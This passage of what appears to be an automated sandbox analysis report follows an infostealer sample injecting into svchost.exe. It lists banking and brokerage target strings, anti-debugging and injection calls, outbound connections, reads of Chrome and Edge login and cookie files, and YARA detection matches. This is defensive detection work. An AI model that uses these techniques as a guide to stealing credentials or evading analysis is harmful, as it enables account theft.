              Source: svchost.exe, 00000002.00000002.4526207022.000000000326C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldPasswordLength="7"
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: 9L83v5j083.exe, 00000000.00000003.2052296731.00000000039D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe+
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: svchost.exe, 00000002.00000002.4528192368.00000000066C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09079578 LdrInitializeThunk,2_2_09079578
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_02E434E0 mov eax, dword ptr fs:[00000030h]0_2_02E434E0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_02E43480 mov eax, dword ptr fs:[00000030h]0_2_02E43480
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_02E41E70 mov eax, dword ptr fs:[00000030h]0_2_02E41E70
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.32.1 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.122.6.168 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CF4008Jump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\Desktop\9L83v5j083.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9L83v5j083.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
              Source: 9L83v5j083.exeBinary or memory string: Shell_TrayWnd
              Source: 9L83v5j083.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: 9L83v5j083.exeBinary or memory string: WIN_XP
              Source: 9L83v5j083.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: 9L83v5j083.exeBinary or memory string: WIN_XPe
              Source: 9L83v5j083.exeBinary or memory string: WIN_VISTA
              Source: 9L83v5j083.exeBinary or memory string: WIN_7
              Source: 9L83v5j083.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4526971369.0000000005479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPE
